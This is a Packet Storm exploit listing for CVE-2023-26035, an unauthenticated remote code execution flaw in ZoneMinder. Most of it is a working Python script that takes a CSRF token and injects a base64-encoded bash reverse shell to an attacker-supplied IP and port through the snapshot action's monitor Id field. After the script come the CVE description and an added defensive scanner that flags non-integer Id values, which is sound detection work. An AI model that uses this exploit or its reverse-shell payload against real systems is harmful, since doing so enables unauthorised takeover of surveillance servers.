ZoneMinder Snapshots Remote Code Execution

ZoneMinder Snapshots versions prior to 1.37.33 suffer from an unauthenticated remote code execution vulnerability.

Packet Storm
import re
import requests
from bs4 import BeautifulSoup
import argparse
import base64

# Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
# Date: 12 December 2023
# Discovered by : @Unblvr1
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://zoneminder.com/
# Software Link: https://github.com/ZoneMinder/zoneminder
# Version: prior to 1.36.33 and 1.37.33
# Tested on: Arch Linux, Kali Linux
# CVE : CVE-2023-26035
# Github Link : https://github.com/rvizx/CVE-2023-26035


class ZoneMinderExploit:
    def __init__(self, target_uri):
        self.target_uri = target_uri
        self.csrf_magic = None

    def fetch_csrf_token(self):
        # The snapshot form is served without authentication; read the __csrf_magic
        # value from it so the later POST passes ZoneMinder's CSRF check.
        print("[>] fetching csrf token")
        response = requests.get(self.target_uri)
        self.csrf_magic = self.get_csrf_magic(response)
        if (response.status_code == 200 and self.csrf_magic
                and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic)):
            print(f"[>] received the token: {self.csrf_magic}")
            return True
        print("[!] unable to fetch or parse token.")
        return False

    def get_csrf_magic(self, response):
        # Returns None instead of raising when the hidden input is absent.
        field = BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'})
        return field.get('value', None) if field else None

    def execute_command(self, cmd):
        # monitor_ids[0][Id] is passed through to TriggerOn and then shell_exec
        # on vulnerable versions, so a leading ';' terminates the intended command.
        print("[>] sending payload..")
        data = {
            'view': 'snapshot',
            'action': 'create',
            'monitor_ids[0][Id]': f';{cmd}',
            '__csrf_magic': self.csrf_magic,
        }
        response = requests.post(f"{self.target_uri}/index.php", data=data)
        print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")

    def exploit(self, payload):
        if self.fetch_csrf_token():
            print("[>] executing...")
            self.execute_command(payload)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
    parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
    parser.add_argument('-p', '--port', required=True, help='port')
    args = parser.parse_args()

    # generating the payload
    ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"
    ps2 = base64.b64encode(ps1.encode()).decode()
    payload = f"echo {ps2} | base64 -d | /bin/bash"
    ZoneMinderExploit(args.target_url).exploit(payload)

Related news

CVE-2023-26035: Unauthenticated RCE in snapshots

ZoneMinder is a free, open source closed-circuit television software application for Linux which supports IP, USB and analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to unauthenticated remote code execution via missing authorization. There is no permission check on the snapshot action, which expects an id to fetch an existing monitor but can instead be passed an object that creates a new one. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in versions 1.36.33 and 1.37.33.
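The description above pins the flaw to one parameter: the snapshot action's monitor_ids[N][Id] should only ever be an existing monitor's integer id, yet it reaches shell_exec unchanged. As an added defender-side example (not code from the Packet Storm listing or from the ZoneMinder project), the following Python shows the integer check a hardened handler needs and a small scanner that flags request bodies where view=snapshot&action=create carries a non-integer Id; the request bodies are constructed samples, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Parameter the snapshot action reads, as named in the advisory: monitor_ids[N][Id]
MONITOR_ID_KEY = re.compile(r"^monitor_ids\[\d+\]\[Id\]$")


def monitor_id_values(body: str) -> list:
    """Return every monitor_ids[N][Id] value found in a URL-encoded POST body."""
    params = parse_qs(body, keep_blank_values=True)
    return [v for key, vals in params.items() if MONITOR_ID_KEY.match(key) for v in vals]


def is_valid_monitor_id(value: str) -> bool:
    """Hardened check: an existing-monitor id is a plain positive integer.
    Anything else (e.g. ';id') is exactly what TriggerOn would hand to shell_exec
    on vulnerable versions, so it must be rejected before any lookup or command."""
    return value.isdigit() and int(value) > 0


def flag_snapshot_request(body: str) -> bool:
    """True when a body targets view=snapshot&action=create with a non-integer Id."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("view") != ["snapshot"] or params.get("action") != ["create"]:
        return False
    return any(not is_valid_monitor_id(v) for v in monitor_id_values(body))


# Constructed sample request bodies (not captured traffic): a legitimate snapshot
# of monitor 3, an injection attempt with ';id' as the Id, and an unrelated request.
SAMPLE_BODIES = [
    "view=snapshot&action=create&monitor_ids%5B0%5D%5BId%5D=3&__csrf_magic=key%3Aabc%2C1",
    "view=snapshot&action=create&monitor_ids%5B0%5D%5BId%5D=%3Bid&__csrf_magic=key%3Aabc%2C1",
    "view=console&action=login",
]


def scan(bodies=SAMPLE_BODIES) -> list:
    """Indexes of bodies that should be alerted on."""
    return [i for i, b in enumerate(bodies) if flag_snapshot_request(b)]


if __name__ == "__main__":
    for idx in scan():
        print(f"[!] suspicious snapshot request at index {idx}: {SAMPLE_BODIES[idx]}")
```

Because the root cause is a missing authorization check, a snapshot create request arriving without a valid session is itself a strong signal, independent of the Id value; the scanner above only covers the parameter side.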
